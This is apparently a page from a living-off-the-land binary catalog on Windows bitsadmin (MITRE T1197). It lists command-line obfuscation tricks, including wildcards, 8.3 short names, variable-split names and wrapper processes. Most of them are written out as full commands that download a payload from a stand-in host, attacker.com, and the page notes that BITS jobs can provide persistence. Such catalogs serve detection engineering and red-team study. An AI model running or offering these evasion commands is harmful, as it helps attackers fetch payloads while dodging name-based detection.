bitsadmin

Windows CMD download T1197

Background Intelligent Transfer Service admin tool. Can download or upload files using BITS jobs, bypassing some network controls.

Binary Paths

  • C:\Windows\System32\bitsadmin.exe

Glob Patterns

Pattern Notes
for /f %i in ('where bits*.exe') do %i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
Star matches 'admin' after 'bits'
for /f %i in ('where b*admin.exe') do %i
Star replaces 'its'
for /f %i in ('where bitsad?in.exe') do %i
Single char wildcard replaces 'm'
for /f %i in ('dir /b C:\Windows\System32\bits*.exe') do %i
dir /b with glob pattern
forfiles /p C:\Windows\System32 /m bits*.exe /c "@file /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe"
forfiles * mask finds bitsadmin.exe — @file expands to matched filename for execution
C:\Windows\System32\BITSAD~1.EXE /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
8.3 SFN — requires NtfsDisable8dot3NameCreation=0; BITSAD~1 is the auto-generated short name for bitsadmin.exe
for %i in (C:\Windows\System32\bits*.exe) do @%i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
Native CMD for loop with filesystem glob — expands bits*.exe directly in System32 without where.exe
for /f %i in ('where /r C:\Windows bits*.exe') do %i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
Recursive where search across Windows tree — finds bitsadmin.exe regardless of System32 vs SysWOW64 location
set a=bits& set b=admin& call %a%%b% /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
Binary name split across two SET variables — CALL resolves %a%%b%=bitsadmin; name never appears as literal string
cmd /c for /f %i in ('where bits*.exe') do %i /transfer job /download /priority normal http://attacker.com/p.exe C:\p.exe
cmd /c wrapper adds an extra process layer — glob still resolves via where; parent process becomes cmd.exe not the caller

Pattern Tester

$

Try typing bitsadmin or a full path like C:\Windows\System32\bitsadmin.exe

YARA Rule

Auto-generated detection rule for bitsadmin 

      

    


    
    

      
Platform Notes

      
CMD glob evasion requires the for /f + where pattern. BITS jobs persist across reboots by default, making bitsadmin useful for persistence too.



8.3 SFN note: Short filename paths (BITSAD~1.EXE) only exist when 8.3 name generation is enabled (NtfsDisable8dot3NameCreation=0 in the registry).



    

    

    
    

      
Resources

      
    

    

    

  


  

    
    
    
    
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
      
    
      
    

      
      
        ← Previous
        bash
      
      

      Catalog

      
      
        Next →
        cat